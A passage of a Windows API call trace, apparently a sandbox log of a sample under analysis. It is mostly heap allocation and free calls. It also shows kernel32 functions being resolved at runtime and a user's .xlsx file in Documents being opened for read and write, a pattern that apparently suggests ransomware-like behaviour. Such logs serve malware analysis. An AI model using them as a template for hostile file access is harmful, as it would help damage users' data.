lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.004] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd618 [0169.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd618, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0169.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.005] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0169.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0169.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0169.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0169.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.005] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0169.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0169.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0169.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa6b008 [0169.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0169.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3a) returned 0x8db0a8 [0169.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", cchWideChar=58, lpMultiByteStr=0x8db0a8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpUsedDefaultChar=0x0) returned 58 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0169.008] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8kguilkgyer.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0169.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0169.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0169.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74) returned 0x8afe68 [0169.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=58, lpWideCharStr=0x8afe68, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx") returned 58 [0169.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0169.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0169.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0169.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0169.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.011] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0169.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.013] PeekMessageW (in: lpMsg=0x87f3fc, 